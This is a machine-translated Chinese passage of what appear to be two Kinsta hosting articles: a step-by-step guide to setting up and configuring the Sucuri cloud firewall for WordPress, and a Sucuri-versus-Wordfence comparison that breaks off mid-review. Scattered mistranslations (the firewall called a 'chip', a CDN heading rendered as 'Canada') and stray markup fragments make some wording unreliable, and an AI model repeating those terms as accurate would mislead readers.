下面我们将深入探讨如何在你的 WordPress 站点上设置 Sucuri 的防火墙,以及最佳设置和你应该选择的计划,以获得最佳效果。
- 关于苏库里晶片
- 你需要苏库里吗?
- 推荐苏库里计划
- 如何设置 Sucuri 防火墙
- 最佳 Sucuri 设置
关于苏库里瓦夫
Sucuri 是一个一体化的网站安全平台,有助于保护您的企业免受安全威胁,并减少已经在进行的攻击。他们提供各种不同的产品和服务,如 CDN、恶意软件扫描、黑客修复、DNS 监控、文件更改检测、暴力保护等等。
T2】今天,我们只关注一个产品,那就是 Sucuri 网络应用防火墙(WAF)。Sucuri 防火墙是基于云的,旨在阻止网站黑客和攻击(包括不良流量)。它是如何工作的?本质上,你把你的域名指向他们,他们把你的流量路由到你的 WordPress 主机。网络应用防火墙位于中间,在流量到达你的主机之前阻止它。
Web Application Firewall (Image Source: Sucuri)
Sucuri 的团队一直在研究新的方法,以提高对不断演变的威胁的检测和缓解能力。他们甚至允许您添加自己的自定义规则,这使得他们的服务非常强大!
你需要苏库里吗?
你真的需要像 Sucuri 这样的服务吗?看情况。在你的 WordPress 站点和你的主机提供商之间有一个网络应用防火墙绝对不是一件坏事。😉事实上,这很可能会节省你的时间和麻烦。
不幸的是,我们通常不会看到客户使用像 Sucuri 这样的服务,直到他们开始遇到问题。最常见的情况是 DDoS 攻击以及来自僵尸程序和代理服务器的不良流量。当我们说“坏”的时候,我们并不总是指有人试图黑你的网站。大多数时候,实际上是大量的流量导致了主机提供商的超龄问题。这可能是在访问,带宽等方面。换句话说,这是“糟糕”的交通,因为它花了你的钱!如果你使用共享主机提供商,甚至可能导致你的 WordPress 站点被暂停。
下面是一个网站的例子,该网站在一夜之间突然受到不良代理 IP 流量的攻击。我们可以看到使用 MyKinsta analytics 的确切时间。该网站从平均每天 125 次访问增加到每天 1500 次访问(不幸的是,这不仅仅是暂时的病毒式流量)。它还从每天使用 25 MB 带宽增加到每天 25 GB 带宽。呀!
Bot and proxy traffic
深入分析后,我们可以看到访问该网站最多的地区是阿雷佐省,在过去的 30 天内有超过 400 万次请求。这个网站通常有超过 90%的流量来自美国,所以我们可以很容易地找到它的源头。
Spam traffic by region
包括 Kinsta 在内的大多数主机提供商都会阻止常见的不良僵尸程序,过滤掉垃圾 IP,并进行额外的安全设置,如 IP 限制。然而,这通常不如 Sucuri 或 Cloudflare 等专业 WAF 有效,它们的整个商业模式都围绕着创新,以更好的方式过滤不良流量。
这也是为什么我们不推荐使用你的 WordPress 主机来托管电子邮件。只使用各自领域和行业中最好的工具和服务,将有助于你的企业取得成功。我们专注于我们最擅长的领域,那就是提供高性能的托管和世界一流的支持。👍
T3】
在苏库里之前要做的事情
如果你的 WordPress 站点遇到流量不佳的问题,在添加 Sucuri 之前,你可以做一些尝试。
1.手动阻止单个 IP 地址
第一种是尝试手动拦截违规的 IP 地址。如果你是 Kinsta 的客户,你可以使用 MyKinsta Analytics 中的顶级客户 IPs 报告来查看顶级违规者。
Top client IPs
在谷歌上搜索一下 IP 地址,我们可以看到很多 IP 地址可能来自意大利(阿雷佐省就在那里)。所以他们很可能是机器人或垃圾邮件发送者。
Proxy IP addresses
然后,您可以使用 IP 拒绝工具来阻止 IP 地址。随后监控你的访问和带宽,看看它是否能解决问题。在某些情况下,它可能只是一对夫妇坏 IP 打你的网站,一旦被封锁,你就可以走了。然而,它也可能变成一个永无止境的将 IP 列入黑名单的过程,这并不能足够快地解决问题。
Blocked IP addresses
如果你不是 Kinsta 客户端,你可以使用众多安全插件中的一个,其中很多都有 IP 拦截和限制功能。
但是要小心这种方法。许多安全插件由于其始终在线和扫描功能而导致性能问题。这就是为什么 Kinsta 禁止一些(不是全部)安全插件的原因。Kinsta 还利用谷歌云平台的负载平衡器,这意味着在某些情况下,一些安全插件的 IP 阻止功能不会像预期的那样工作。
2.地理阻塞
另一个建议是阻止来自整个地区或国家的流量。事实上,Kinsta 确实支持地理封锁。您只需联系我们的支持团队,并提供您想要阻止的国家的 ISO 代码。查看更多关于基于位置的交通拒绝的细节。
或者你可以尝试使用 WordPress 安全插件,比如支持地理屏蔽的 IP 位置屏蔽或 WordFence 。同样,这些在 Kinsta 上不受支持,也不会起作用。
如果上面的解决方案不适合你,我们建议你实现一个高级的 WAF,比如 Sucuri。没有插件需要安装或管理,它只是位于你的网站和你的主机之间。就性能而言,这是最好的方法,然后它会像变魔术一样,消除所有糟糕的流量!
推荐的 Sucuri 防火墙计划
我们推荐 Sucuri Pro 防火墙计划或更高版本。为什么?因为他们的 Pro 计划(20 美元/月)包括对定制 SSL 证书的支持,以及在第 3、4 和 7 层的高级 HTTPS DDoS 保护。如果您感到好奇,Cloudflare 在其 200 美元/月的计划中仅包括第 7 层保护。
这有助于自动检测流量的突然变化,并防止 POST floods 和基于 DNS 的攻击,因此它们永远不会到达您的原始服务器。除非您是安全专家,否则有时很难区分小型 DDoS 攻击和淹没您站点的简单恶意流量。
HTTP flood 攻击是一种第 7 层应用程序攻击,它利用标准的有效 GET/POST 请求来获取信息,如在典型的 URL 数据检索(图像、信息等)中。)在 SSL 会话期间。HTTP GET/POST 泛洪是一种体积攻击,它不使用格式错误的数据包、欺骗或反射技术。–苏库里
Pro 计划还包括 HTTP/2 支持,这是一个在性能方面你肯定想要的特性。所有计划中包含的其他功能包括:
- 入侵检测系统
- 入侵防御系统
- 托管审计日志/安全性
- HTTP 洪水保护
- 强力保护
- 虚拟修补和加固
- SQL、XSS 和代码注入预防(延伸阅读: SQL 注入
- 任何页面上的一键式 2FA、验证码和密码保护
- 外部 CDN 支持
- 负载平衡
他们确实有 30 天的免费试用期。
如何设置 Sucuri 防火墙
今天我们将带你了解如何使用推荐的 Pro 计划在你的 WordPress 站点上设置 Sucuri 防火墙。这其实很简单,只需要几分钟。
第一步
首先,注册su curi Pro 计划,如果你还没有注册的话。
第二步
一旦进入 Sucuri 仪表板,点击“立即保护我的网站!”按钮。
Sucuri protect my site
第三步
输入您的域名并配置以下选项(这三个选项我们都不选):
- 在 DDoS 攻击下:启用这个会自动启用 Sucuri 的一些更激进的选项。如果你确定你正在遭受攻击,你可能需要启用它。这些设置可以随时更改。
- 白名单目录:如果您想将管理目录的访问权限限制为白名单 IP 地址,请启用此选项。(例如/wp-login 或/admin)。注意:在电子商务网站上,你可能会想离开这个禁用。请记住,客户也使用这些区域。
- Sucuri DNS: Sucuri 让您可以选择使用他们的 DNS 基础设施。这允许他们进行地理路由,以优化全局性能、故障转移和高可用性。但是,今天我们将取消选择该选项,因为我们希望继续使用我们自己的第三方 DNS 提供商。例如,如果您正在使用 Kinsta DNS,并希望继续在 Kinsta 管理您的 DNS 记录,请取消选择此选项。
Add site website firewall
第四步
重要提示:如果您采用 Sucuri 的 Pro 或更高级计划,他们可以在您更改 DNS 之前在防火墙上提供并安装 GoDaddy SSL。GoDaddy 证书将自动续订,并包含在每月费用中。因此,在转到专业计划时,您应该有一个平稳的过渡,不会导致任何停机。
只需向他们的团队开一张票,要求他们首先安装 GoDaddy 证书。然后,您可以更新您的 DNS。
使用让我们用 Sucuri 加密证书
或者,另一个选择是他们提供免费的让我们加密证书。但是,这些只能在您将您的域指向它们之后才能发布。如果你决定使用他们免费的“让我们加密”选项,我们建议在非高峰时段访问你的网站。
使用金斯塔加密证书
Kinsta 还提供免费的让我们加密证书。要使用我们的,你必须首先联系他们的支持,让他们启用“转发证书验证”的设置这使得 HTTPS 资源调配能够成功完成。然后可以从 MyKinsta 仪表板安装免费的 SSL 证书。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
第五步
现在是时候指出你的领域了。在常规仪表板页面上向下滚动到他们提供 DNS 信息的位置。您将需要更新您的域的 A 记录,以指向 Sucuri 的防火墙。这通常由您的域名注册商或 DNS 提供商完成。
Point A record to the firewall
注意:Sucuri 应该会自动获取你当前的 IP 地址。所以一旦你将你的域名指向 Sucuri,他们会自动将流量路由回你的 WordPress 主机。
如果您使用的是 Kinsta DNS,这可以通过 MyKinsta 仪表板来完成。单击您的域,用提供的 Sucuri IP 地址更新 A name 记录。
Sucuri Firewall IP
DNS 更改可能需要 48 小时才能传播,但通常只需几个小时或更短时间。您可以检查您的 DNS 是否已通过whatsmydns.net传播。你也可以点击 Sucuri 仪表板上的“刷新”图标来确认你的域指向它们。
Sucuri activation
一旦他们检测到所有线路都正确,它就会变绿。
Sucuri activated
第六步
如果你的 WordPress 主机上有防火墙,建议你将 Sucuri IP 地址列入白名单。由于所有到你的主机服务器的连接都将通过他们的防火墙,通过将他们的 IP 地址列入白名单,这将防止他们被错误地阻止。注意:下面的 IP 是简单的例子,请查看您的仪表板,根据您的帐户找到正确的 Sucuri IPs。
192.88.134.0/23
185.93.228.0/22
2a02:fe80::/29
66.248.200.0/22
kinsta 客户端
如果您是 Kinsta 的客户,您需要联系我们的支持团队,让我们在您的网站上添加适当的 Sucuri WAF 规则。Sucuri 的 IP 已经在我们的环境中列入白名单,但我们已经与他们的团队密切合作,并需要添加额外的 Nginx 规则,以确保您的 Kinsta + Sucuri 体验没有任何问题。
T3】
最佳 Sucuri 设置
我们通常不推荐使用 Sucuri WordPress 插件,因为这只会产生额外的开销、管理和性能问题。让位于你的 WordPress 站点和你的主机之间的 Sucuri 防火墙在服务器层面上做它最擅长的事情。
以下是您应该在 Sucuri 仪表板中应用的一些推荐设置。
高级安全选项
在“安全”选项卡下,我们建议启用以下选项:
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
- XMLRPC,评论和引用通告被阻止:如果你的网站不允许评论,或者如果你使用外部评论系统(如 Disqus),你可以阻止任何评论尝试,因为它很可能是垃圾邮件。如果你使用本地评论,不要启用这个。
- 阻止匿名代理和前三大攻击国家:启用此选项将阻止来自中国、俄罗斯或土耳其的任何人与您的站点进行交互。他们仍然可以查看所有内容,但不能注册帐户、提交评论或尝试登录(基本上锁定为只读模式)。同样的限制也适用于使用匿名代理服务隐藏 IP 地址的用户。
- 攻击性 bot 过滤器:该设置将阻止与真实浏览器不匹配的无效用户代理,如空用户代理、以 PHP 开头的用户代理和来自普通浏览器的不当用户代理。
- 高级规避检测:此选项将启用 Sucuri 的高级规避检测签名。我们建议保持它,但是如果你的站点支持非 ASCII 字符的 URL(像日语、印度语、俄语等),你可能需要禁用它。
Sucuri advanced security settings
如果你认为你的网站受到攻击,“启用紧急 DDoS 保护”非常有效。HTTP 洪水保护将阻止任何人使用未启用 JavaScript 的浏览器访问该网站(主要搜索引擎除外)。然而,根据我们的经验,它还会在初始文档加载时生成一个额外的 HTTP 请求。因此,建议在事情正常化后关闭此功能。
您还可以在您的站点上启用额外的安全标题,如 HSTS 。
贮藏
在“性能→缓存级别”下,您可以配置希望 Sucuri 如何处理缓存。很可能你的 WordPress 站点已经为缓存设置好了。因此,我们建议选择“站点缓存”这将尊重你的原始服务器的缓存,而不是使用 Sucuri 的。如果你是 Kinsta 的客户,这意味着你的网站将继续使用我们的快速整页缓存,它不会干扰我们现有的任何自定义规则。
Sucuri site caching
您完全可以测试 Sucuri 推荐的缓存选项,甚至可以看到它的性能有所提高。但是,如果你在运营一个高度动态的网站,比如 WooCommerce 或 EDD,就要注意了。在 Kinsta,我们有额外的规则来不缓存某些东西,比如购物车页面、结账页面,最重要的是 cookies。Sucuri 实际上建议电子商务网站使用你自己的网站标题。
加拿大
Sucuri 允许你使用自己的第三方 CDN(比如 KeyCDN,MaxCDN)或者他们自己的 CDN。Sucuri 的 CDN 具有快速 HTTP/2 Anycast 网络,在美国、欧洲和亚洲有 6 个 SuperPOPs,在澳大利亚、巴西和菲律宾有 3 个 CDN POPs。当你使用他们的防火墙时,这是免费的。
Sucuri CDN
您可以将 Kinsta CDN 与 Sucuri 一起使用,但他们的 CDN 快速可靠,我们通常推荐使用其中一种。如果您想使用 Kinsta CDN,您需要在 CDN 支持选项卡下选择“其他”。
如果你想用第三方 CDN 建立你的网站,你也可以这样做。只需查看他们的知识库,了解关于第三方 CDN 集成的演练:
压缩
在“性能→压缩”下,我们建议启用压缩。这将减少通过网络发送的字节数,并提高您的网站的性能。
Sucuri enable compression
就是这样!让苏库里在接下来的几天里施展它的魔法,你可能会对结果感到惊喜。在我们部署的网站上,带宽立即下降,访问量恢复到以前的正常日均水平。
Resources after Sucuri WAF
其他有用的功能和报告
既然您已经配置了 Sucuri,那么您可以利用许多其他有用的特性和报告来进一步提高访问您站点的流量质量。
访问控制
“访问控制”选项卡使您能够将 IP 和路径列入白名单和黑名单,阻止用户代理,阻止 cookies,阻止 HTTP 推荐人,还可以使用 captcha 、双因素或简单密码保护某个页面。你也可以很容易地封锁整个国家与他们的地理封锁功能。
Sucuri geo-blocking
实时视图
实时视图太棒了!您可以快速查看当前请求的完整日志,一键将任何可疑内容列入黑名单或白名单,如果已经被阻止,它甚至会给你一个原因。
DDoS protection real-time view
拦截的攻击
拦截的攻击图表允许您快速查看拦截的攻击类型的百分比,包括 DDoS 攻击。此窗口中的其他一些图表包括按浏览器类型、设备和 HTTP 响应代码划分的流量。
Sucuri blocked attacks
平均每小时交通量
每小时平均流量图表便于查看流量的高峰时间以及被阻塞请求的比率。
Average traffic per hour
按国家划分的交通
按国家/地区划分的流量表可以帮助您确定某些信息是否来自某个特定的地理位置。在他们的访问控制下,只需轻轻一点,你就可以轻松地暂时封锁整个国家。
Traffic by country
查看真实 IP
在您这边,似乎所有用户都在使用同一个 IP 地址。这仅仅是由于 WAF。如果您的应用程序或主机需要真实的用户 IP,请查看 Sucuri 文档。
摘要
Sucuri 防火墙非常容易设置,如果您遇到低质量流量、DDoS 攻击或僵尸程序的问题,这是一个显而易见的问题。对于许多网站来说,20 美元/月的费用将会收回,因为它将确保坏的流量被过滤掉,只允许付费用户进入。更不用说你可能会看到网站前端和后端的性能都有所提高。
你觉得苏库里怎么样?你在你的 WordPress 网站上试过吗?请在评论中告诉我们。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
Sucuri vs Wordfence: WordPress 安全插件对决
WordPress security 就像一颗滴答作响的定时炸弹。你永远不知道它什么时候会爆炸。每天都有数千个 WordPress 网站被黑。这是一个严重的问题,应该在它发展成威胁之前就扼杀在萌芽状态。
有两个主要的方法来保护你的 WordPress 站点:第一,选择一个安全的托管服务,它有着遵循行业最佳实践的良好记录。第二,通过专门的第三方安全服务来加强网站的安全性。
有了 WordPress security,Wordfence 和 Sucuri 是两个最受欢迎的选项。它们都有一套强大的安全功能来保护您的网站安全。在许多方面,他们是相同的,但是不同的。
Wordfence 还是 Sucuri?如果你想知道这两者中哪一个最适合你的网站,这篇文章将帮助你做出决定性的决定。我广泛地使用了它们,一对一地比较了它们的各种功能、性能、定价和它们提供的总价值。
您可以使用这些信息来选择最适合您的选项。
听起来不错?我们开始吧!
WordPress 安全性介绍
WordPress 是世界上最流行的内容管理系统。它如此受欢迎,以至于超过 35%的 T2 网站都使用它。大受欢迎就会带来大麻烦!
WordPress 一直受到黑客的威胁。根据 GoDaddy Security 的报告,2018 年所有被黑的 CMS 平台中,90%是 WordPress 网站。仅谷歌每天就将 10000 个托管和传播恶意软件的网站列入黑名单,这些列入黑名单的网站会损失高达 95%的有机流量。
WordPress Security Statistics
被黑的 WordPress 网站中有 41% 是因为托管平台中的漏洞而被。因此,你可以从一开始就用安全的 WordPress 托管平台避免很多麻烦。
更令人吃惊的是,60%的小企业在网络攻击后的 6 个月内关闭。由于绝大多数黑客攻击都发生在中小型企业,因此保护您的网站更加重要。
黑客如何入侵 WordPress 网站
仅 36.7%的 WordPress 网站被黑是由 WordPress 过时的易受攻击版本引起的。WordPress 网站的主要攻击媒介是它的可扩展组件,即插件和主题。
How WordPress is compromised (Image source: Wordfence)
外挂尤其是最大的风险!正如 Kinsta 的 WordPress 安全文章中提到的,带有已知和未知漏洞的插件构成了 WordPress 黑客攻击的主体。一项 Wordfence 研究发现它们代表了所有已知后门的 55.9% 。
猜测弱密码的暴力攻击是下一个大的攻击载体,占黑客攻击总数的 16.1%。同一项研究发现了另一个令人震惊的数据: 61.5% 的被黑网站所有者甚至不知道他们的网站已经被入侵。
如何保护你的 WordPress 站点
有三个主要步骤来保护你的 WordPress 网站免受网络攻击:
The 3 pillars of web security
预防
无论是生物疾病还是数字恶意软件,预防总是胜于治疗!
虽然 WordPress 是免费的,但是建立一个 WordPress 网站的成本,然后保护和维护它,却不是。但可悲的是,在建设网站时,安全性往往是最不重要的。
WordPress 核心团队在保证 WordPress 安全方面做得非常好。但是如前所述,大多数 WordPress 黑客并不是来自其核心软件。
预防的重点是防止恶意代码进入你的 WordPress 站点。通常是通过防火墙、反病毒程序、电子邮件过滤解决方案、防御 T2 DDoS 攻击和不良机器人等来完成的。
侦查
检测的重点是在安全事件发生时立即意识到它们,以便您可以立即采取行动,并在任何重大损害发生之前保护您的网站。
包括入侵检测系统、网络扫描、完整性监控等工具。
许多被黑的 WordPress 网站的所有者甚至不知道他们网站的安全被破坏了。因此,拥有强大的检测系统至关重要,尤其是在托管级别。安全插件如 Sucuri 或 Wordfence 都是很好的插件。
响应和恢复
抱最好的希望,但要做最坏的打算!响应和恢复侧重于快速高效地解决安全事件。
一个好的恢复过程不仅应该在攻击后进行清理,还应该包括备份和取证功能。这可以确保您在类似事件发生之前阻止它们的发生。
这就是为什么你必须在与他们签约之前对你的托管公司的安全承诺进行彻底的研究的主要原因。例如,如果你的 WordPress 网站在 Kinsta 托管时遭到黑客攻击,Kinsta 的安全专家将与你合作识别并移除恶意软件。
Sucuri 或 Wordfence 等安全服务提供事故响应服务,作为其专业服务包的一部分。
Sucuri vs Wordfence
Sucuri 和 Wordfence 都可以帮助你保护你的 WordPress 站点,但是他们的方法不同。下面是他们之间的一个快速摊牌:
| | 苏库里 | 文字围栏 |
| 防火墙定价(WAF) | 起价为每月 9.99 美元 | 起价 99 美元/年 |
| 恶意软件移除定价 | 起价 199.99 美元/年—无限制清理 | 每次清理 179 美元 |
| 可用的免费插件 | 是 | 是 |
| 网络应用防火墙(WAF) | 是的,但只针对高级客户 | 是的,它是免费的 |
| 网站完整性扫描 | 是 | 是 |
| SSL 证书支持(在 WAF 上) | 是 | 不 |
| DDoS 攻击防护 | 是 | 不 |
| 零日漏洞防范 | 是 | 不 |
| 用于提高性能的 CDN | 是 | 不 |
| 基于云的平台 | 是的,远程扫描 | 不 |
| 自托管平台 | 不 | 是的,本地扫描 |
| 系统安全调整 | 不 | 是 |
上表涵盖了 Sucuri 和 Wordfence 之间的主要区别。现在,让我们深入挖掘!
信息
两个插件都是兼容的,并允许在 Kinsta 主机上运行。
Sucuri Review(摘要审阅)
Sucuri Security is a free security plugin for WordPress
Intro to Sucuri
Sucuri 是一款基于云的网站安全工具,用于保护网站安全。它过滤所有到你网站的流量,甚至在它到达你的主机服务器之前。
其核心功能包括恶意软件检测、完整性监控和安全强化。Sucuri 远程扫描一切,因此它不会在服务器级别执行任何深度扫描。
Sucuri 承诺保护网站,提高性能,监控黑客的迹象,并为安全事件提供无限支持(仅限高级用户)。
Sucuri Security has 4.4-star rating with 600,000+ active installs
你应该注意到 Sucuri 并不是满足你所有网站安全需求的灵丹妙药。它旨在补充您现有的网络安全。然而,Sucuri 为您提供了许多降低风险的工具,让您更加安心,安全意识更强。
Sucuri 如何工作
当谈到 Sucuri 如何工作时,最好区分一下它的三个层次:
- Sucuri Security 是一个免费插件,带有标准的 WordPress 安全加固特性。该插件的免费版本不包括防火墙。
- 【Sucuri 防火墙(WAF) 是一项付费服务,你可以与免费的 Sucuri 安全插件集成。你也可以使用没有插件的防火墙。它包括网站保护功能,如网站应用防火墙 (WAF)、用于性能优化的 CDN、用于高可用性的负载平衡、入侵检测系统(IDS)、DDoS 缓解以及一系列其他工具。
- Sucuri 平台 是一套基于云的优质安全服务。它包括 Sucuri 防火墙的所有功能,以及其他重要功能,如监控、检测和事件响应。通过注册 Sucuri 平台,你可以要求 Sucuri 团队为你的网站“删除所有恶意软件&黑名单警告”。
How the Sucuri Web Application Firewall (WAF) works
为了更好地理解,这里有一个苏库里工作时的简短视频:
Sucuri 跟踪你网站的每一个变化,并将日志保存到它自己的云服务器上。你可以审核这些日志来找出到底哪里出了问题。这有助于快速有效地解决安全问题。
可用的安全设置和功能
你可以将 Sucuri 的 WordPress 产品分为两个主要产品:一个名为 Sucuri Security 的免费插件,和一个基于云的 Sucuri 防火墙(WAF) 。
我们先来看看免费插件。
Sucuri 安全仪表板有一个简单明了的界面,可以让你清楚地看到它的安全检查。
它的主要任务是通知你核心 WordPress 文件的完整性。如果发现任何受损的核心文件,它会给你一个警告。然后,您可以采取适当的措施:用原始文件替换受感染的文件,或者将它们标记为误报。
在这里的审计日志标签下,你会发现你的网站上发生的每一个变化。同样,在iframe、链接、和脚本标签下,你可以在你的网站上找到脚本和链接的每一个实例。
The Sucuri Security dashboard. Note the warning on the top right
在我的情况下,警告是一个假阳性。所以,我标记为手动修复。Sucuri 将在下次执行扫描时记住此修复。
You can teach Sucuri to ignore false positive warnings
设置面板有许多标签可以定制 Sucuri 如何保护你的网站。在通用设置选项卡下,可以找到您的 API Key 、数据存储目录,以及其他设置如日志导出器、、反向代理、、 IP 地址发现器和时区覆盖。
您还可以从这里导入或导出 Sucuri 的整体设置。
The General Settings tab in Sucuri Security
接下来,让我们转到扫描仪选项卡。在这里,你可以看到 Sucuri 的预定任务, WordPress Integrity Diff 实用程序设置(将你服务器上的文件与原始文件进行比较),以及一个误报列表。
如果你想忽略服务器上的某些文件和文件夹,你可以在这里设置。该工具有助于忽略与代码无关的文件和文件夹,这些文件和文件夹可能太重而无法扫描,例如包含大量媒体文件、备份等的文件夹。
Set your scanner settings from here
加固标签允许你应用一套标准的 WordPress 和 PHP 安全加固方法。但是您可以使用白名单阻止的 PHP 文件设置来从这些严格的限制中省略某些 PHP 文件。
Applying standard security hardening rules
万一遭到攻击或破坏, Post-Hack 标签将会非常方便。在这里,你可以更新密钥,重置用户密码,重置已安装的插件,并应用任何可用的插件和主题更新。
Quick tools to beef up security if you’ve been hacked
警报选项卡允许您设置警报接收者、可信 IP 地址、警报主题、每小时警报。您可以设置哪种安全警报将触发警报机制,以及它将忽略哪些类型(通常是第三方插件)。这是一个很棒的检测功能。
Sucuri Security lets you customize alerts
API 服务通信标签简单明了。主要是供开发者访问 Sucuri 的远程 API 服务。
Communicate with Sucuri’s remote API service from here
最后,网站信息标签列出了几乎所有你想知道的关于你的网站和网站服务器的信息。在这里,在访问文件完整性部分下,您可以检查您的的完整性。htaccess 文件。
如果你的网站是由像 Kinsta 这样的托管平台驱动的,这不应该是一个担忧,因为 Kinsta 不使用 cPanel ,而是使用自己的定制用户面板 MyKinsta 。
信息
想试试 MyKinsta 吗?你不需要成为 Kinsta 的用户,只需前往 MyKinsta 演示并创建一个免费账户。
The Website Info tab lists specs of your site and server
Sucuri 基于云的防火墙是一项高级服务。过滤垃圾流量、DDoS 攻击和不良僵尸程序非常有用。
即使没有插件,它也能发挥它的魔力(这是推荐的方式)。你只需要将你的主机的 DNS 指向它的域名服务器。
Sucuri WAF protects your sites from malicious attacks
阅读 Kinsta 的深入的 Sucuri 防火墙指南以了解更多关于它的所有特性。
包括 Kinsta 在内的大多数网络主机都有额外的安全功能来阻止和/或过滤垃圾 IP 地址和不良机器人。Kinsta 甚至有允许 IP 限制的安全设置。
然而,像 Sucuri 这样的专业 WAF 服务,其商业模式主要集中在清除不良流量上,将提供更精细的控制。
用户注册 Sucuri 的基于云的防火墙作为备份,只有在受到攻击时才切换到它,这并不罕见。Sucuri 让这一切变得超级简单。
Sucuri CDN POPs are placed around the world (Image source: Sucuri)
总的来说,Sucuri 不仅仅是一个安全插件或防火墙。这是一个完整的网络安全解决方案,让您的网站免受几乎任何恶意攻击。
易用性
Sucuri 使用起来很简单。用户界面是重点。如果 Sucuri 建议您应用任何安全强化设置,只需单击一下就可以启用它们。
一旦你安装了插件,你需要生成它的免费 API 密匙,你可以直接在你的 WordPress 仪表盘上完成。
Sucuri 自动完成了它的大部分安全功能,所以你可以设置一次,然后永远忘记。你也不必担心更新或维护插件。
*如果 Sucuri 检测到漏洞,它会提醒你。但是如果您想手动控制,它为您提供了许多选项。而且由于 Sucuri 的 WAF 是基于云的,所以不需要你方进行任何技术维护。
总的来说,我发现 Sucuri 的设置和使用非常容易。
Sucuri 在网络安全上的表现
预防
免费的 Sucuri 安全插件足够好,可以在你的 WordPress 网站上保持一个标签,并应用一些标准的安全措施。但它不是为了防止任何针对你的网站的重大攻击而构建的。
如果你正在寻找一个免费的 WordPress 安全解决方案,我不会推荐 Sucuri Security。不要依赖它来保护你的网站。
另一方面, Sucuri 防火墙在抵御 DDoS 攻击、恶意机器人和客户数据泄露方面表现出色。 Sucuri 安全平台更进一步,增加了更多的预防措施。
给你一个来自 Kinsta 的案例研究的例子,给一个遭受 DDoS 攻击的小型电子商务网站添加 Sucuri 防火墙,在激活后一小时内阻止了所有安全问题。
侦查
Sucuri 的免费插件在嗅出你网站上最微小的变化方面做得很好。如果它发现任何异常,它会及时提醒你,以便你可以采取适当的行动。
即使一个黑客把你锁在了你的网站之外,你也可以审计保存在 Sucuri 的云服务器上的日志,找出发生了什么,以及你如何重新获得控制权。
然而,真正在监控和检测方面大放异彩的是高级的 Sucuri 安全平台。它具有各种附加功能,如定期服务器端安全扫描、黑名单监控、SSL 监控、即时通知和日志关联集成( SIEM )。
响应和恢复
一个网络安全平台是不完整的,如果它不能为你提供一个清理被黑网站的方法。
对我来说幸运的是,在苏库里保护我的网站期间,我的网站从未发生过安全事故。但是也有很多人有严重的问题,他们在 G2.com 这样的人群评论网站上分享了他们的经历。
Sucuri enjoys a 4-star rating on G2.com
这里有一个网站的所有者分享了她对苏库里的积极评价。
“当我突然意识到我的网站(主要供教师和儿童使用)遭到黑客攻击时,我需要尽快解决这个问题。在报告问题并注册服务后的半小时内,Sucuri 让我的网站恢复了正常。我再也不会让我的网站不受保护了,并且对 Sucuri 处理这种安全感到满意。”
这里有一位网页设计师分享了她和 Sucuri 一起帮助她清理客户 WordPress 网站的正面经验。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
“我的客户在使用他们的 wordpress 网站时遇到了问题。自从与我的客户签约以来,还没有出现任何网站被黑的问题。”
你应该注意到,有相当多的评论中,用户抱怨 Sucuri 响应票证所花费的时间。理解 Sucuri 的定价策略有助于解释这个问题。
苏库里定价
现在,到了最重要的一点,定价。
Sucuri Firewall pricing and features breakdown
Sucuri 防火墙(WAF)9.99 美元/月起,Sucuri 平台 199.99 美元/年起。注册 Sucuri 平台还可以让你无限制地清除恶意软件和黑客攻击。
Sucuri 的所有保费计划都有 30 天退款保证。
Sucuri 并没有将任何安全特性排除在它的底层计划之外,除了原始服务器上的 SSL 证书支持(这是为第二便宜的计划保留的)。
相反,Sucuri 使用扫描和响应优先级作为激励,让你报名参加他们更高的计划。
Sucuri Platform pricing and features breakdown
这种定价策略为每个 Sucuri 客户提供了相同的预防和检测功能,但对于扫描和恶意软件删除,已注册更高计划的客户获得最高优先级。
每个人都会在适当的时候得到他们的票,但是如果你在最底层,在大多数情况下不会立即得到回应。如果您需要更快的解决方案,您可以选择他们更高的计划。相比之下,Cloudflare 的等效安全解决方案每月花费 200 美元。
我可以理解为什么这种方法会让一些用户感到沮丧,特别是当他们在处理一个被黑客攻击的网站并寻找快速修复的时候。但是考虑到从中获得的总价值,从长远来看,它对大多数 Sucuri 用户来说更好。
现在我们已经介绍了 Sucuri,让我们转到 Wordfence,看看它与它相比如何。
Wordfence 评论
Wordfence Security is a free security plugin for WordPress
Wordfence 简介
Wordfence 是一个免费的 WordPress 安全插件,包括一个端点防火墙(WAF)和一个恶意软件扫描器。
它还具有其他安全措施,如登录安全( 2FA 、登录页面、验证码,限制登录尝试)、实时流量和基于规则的高级阻止。
Wordfence has a 4.8-star rating with 3+ million active installs
与 Sucuri 不同,Wordfence 是一款本地化的防火墙。它驻留在你的网络服务器上,而不是云服务。因此,它可以在更深的层次上执行服务器端扫描,并提供完整的端到端加密。
但是这种优势是以牺牲性能为代价的。
为什么?因为您的服务器资源将分析流量,检查任何恶意意图,并在必要时丢弃流量。如果你在一个资源较少的服务器上托管你的网站(例如共享托管和廉价托管计划),你的网站会爬得很快。
在发生 DDoS 攻击的情况下,大量的恶意流量会淹没你的服务器资源。没有任何本地安全插件可以抵挡得住。与 Sucuri 相比,这是 Wordfence 最大的弱点。
相比之下,如果你启用了 Sucuri 的 WAF,任何恶意的流量在到达你的服务器之前都会被过滤掉。
但是 Wordfence 的本地化 WAF 是一个免费的内置功能,而 Sucuri 的 cloud WAF 是一个高级产品。
Wordfence 如何工作
Wordfence 的防火墙由其威胁防御馈送提供支持,这是一个用于收集防火墙规则、恶意 IP 地址和恶意软件签名的花哨术语。
威胁防御 Feed 与你的 WordPress 网站上安装的 Wordfence 插件整合在一起。它由你的服务器驱动。
How the Wordfence Firewall (WAF) works
使用 Wordfence Premium,您可以获得对威胁防御源的实时更新。它包括以下功能:
- 实时 IP 黑名单、防火墙规则和恶意软件签名更新。
- 高级支持。
- 站点/IP 信誉检查。
- 国家级封杀。
